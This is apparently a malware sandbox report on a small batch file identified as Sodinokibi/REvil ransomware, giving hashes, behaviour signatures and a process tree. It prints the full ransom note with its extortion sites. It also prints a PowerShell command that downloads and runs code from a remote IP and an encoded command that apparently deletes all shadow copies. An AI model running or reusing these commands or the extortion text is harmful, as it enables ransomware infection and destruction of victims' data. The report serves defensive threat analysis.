Overview

overview

10

Static

static

Evb87yyM.bat

windows7_x64

10

Evb87yyM.bat

windows10_x64

10

Analysis

  • max time kernel
    29s
  • max time network
    52s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    04-05-2020 09:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Evb87yyM.bat

  • Size

    190B

  • MD5

    8e4d79c1afbe60f75e7f18f5e125dd5e

  • SHA1

    45a3951131e3b20026690d0d5f3ce0a84d633e31

  • SHA256

    46f6f9a88c6598831db0c71784a9cce294f3647121cba6e7dafe783523aac095

  • SHA512

    3b56433e7e0f688e1c39dac8e3c12e1537ca8c6c6f8dd24cb780ec8d24f6d21c2381eacb1ae4a0785a826f207e8606e3ded0ab904fe86cff10d45c67efa3f3a2

Score
10/10
persistenceransomwaresodinokibi

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/Evb87yyM

Extracted

Path

C:\2gq13331ju-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 2gq13331ju. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). !!!!!!!!!! We have downloaded your documents, databases, documents of your customers, correspondence. We are ready to put everything in public access if you don't contact us !!!!!!!!!!!! [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/48C1B3A143AB7DAE 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/48C1B3A143AB7DAE Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: cTyFGpNNHpdGJF/PUDYRXXmRPygk+4p6Zo9sf8Mu4y3sNOuBbehEmT2RY4txNmy7 O3q9gUSulbCBZhwu01cZ99jUCCNfg82LRV8ZtTh0jzvzke0k7xMn9wqSHbnJXps4 MdJW+uZeU4hOVLxZNrbkPIyXoD69xI5F7aSESSinrbjwSXedcTCJ9e/sCtQdsata Lrbb3RxoG0nf3dX2NvA58EDoS6xNPOoRAJaSGuQvycPwu3E3Nwk86Bb1xpUIwcGS ejyh9Q/THleULF9T+gqKFfthvQmwWMYM04uiPNusfbdFCVsAzPR3cZr14qM71Hde eruKyjKeB3wqkCk6Jj4+QMQCzVptqc2MmBeErYsdEkwv+zT1hYjEHSJltizH+yIr WaeHm+66/mULe88TcjBvBABEhOj+RFz7jMxSEvXvRnzz2FM83Xv98OoxCRu9xD5B i+lXXoUqSe74SnWiFmXykmM2b0jolcRziUqEhJQtbzCIhH/phv82VQFiB2L2FYm9 4hmgQHqwBki38ZmL0cegSez0dZPtkpC5T1s1F0MjUSw0Dm0J7t827J+ad8h12VaV dc+pEUWBQj9QaCEdJW8gqLBV47jBmPnt+Sq1FDRGfD/V7sJXTSYxAlgICGs/auRT ZURoweya54tm4etnqdJAndE9cYA7w8oeXC6rvntJPs7YZcVFDglNApS3i2V52Rne OrFHmJL0xJN8nZiVFxIm7gvyE+KtM/OVlvBCYK7C0e1fAdIrkMadkYu/MkF+w2s+ qqPbLYkJXO8JRCKmumhM/EbKFatwKH+mFOmooPNOmI7EtD/ddr3PuEte0Brd4e1N 38KG5M2V7oWTnFdSm30pcqi3ela+UxU1ea59hsi2v/BbyYmxgMdYoEBH365h/F3Z +NvbJCbZ+BIF+p5LG1A+OHOJcOEW4IXxeZm+Cfx9tILZxR4m9PF6nf+iDLBqBltg h9/jTeC4ShqXyQLEj4TKAX4dYbhgCI6wRt2vEH/uGGBZk6OWRtOoWxpDdKWWC9pE PrWE6/50qyD8Fp2+U99RGmlhVc2/FWNFGASAdM0UY8dGa0T3B8OucVfftK3VsWXT oHmccFJcPEP0WrVr1kniHHYaEizi3gZ2vVjTeTP4VGR50ZZSvGxLvcRwuzfqsGQP kIW3AFLDpy0wHUE95e4Th7Spns9x1ZzH7DIhV0UhNr5ni/gJm5J2+Skm9wqabUfJ 0MJTjLSUhoEvI4TyAGLWFVNM3mvDDVw5KyQ8v8M0Sn4Ye1vxF8TrrMTiLm9OuenE qDN9MXviDUErc2SaqS7OHpMCuw12WUxyXw3xkGUBqBWxyxELMtov2Q== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/48C1B3A143AB7DAE

http://decryptor.cc/48C1B3A143AB7DAE

Signatures

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Makes http(s) request 1 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Drops file in Program Files directory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Evb87yyM.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:888
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Evb87yyM');Invoke-FLEYEFI;Start-Sleep -s 10000"
      2⤵
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      PID:1292
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:784
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1724

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit

  • memory/1292-12-0x0000000008F99000-0x0000000009009000-memory.dmp

    Filesize

    448KB

    Download